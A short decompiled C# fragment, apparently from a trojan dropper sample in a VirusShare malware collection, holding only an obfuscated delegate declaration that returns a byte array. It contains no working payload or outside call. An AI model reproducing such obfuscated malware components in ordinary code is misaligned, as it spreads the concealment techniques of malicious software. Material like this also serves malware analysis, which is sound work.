// Decompiled with JetBrains decompiler // Type: ꧷鰆紐蛚쯕︊粫笎 // Assembly: scan, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null // MVID: C0A4408A-6830-4FA8-819B-3D801C5B54D7 // Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Dropper.Win32.Injector.epwx-6071ef40caa18e93eea0d00f252e0ef03c97d96be12ad3f375d8a38aa3517cd6.exe using System.Runtime.InteropServices; internal delegate byte[] \uA9F7鰆紐蛚쯕︊粫笎([In] object obj0, string _param2);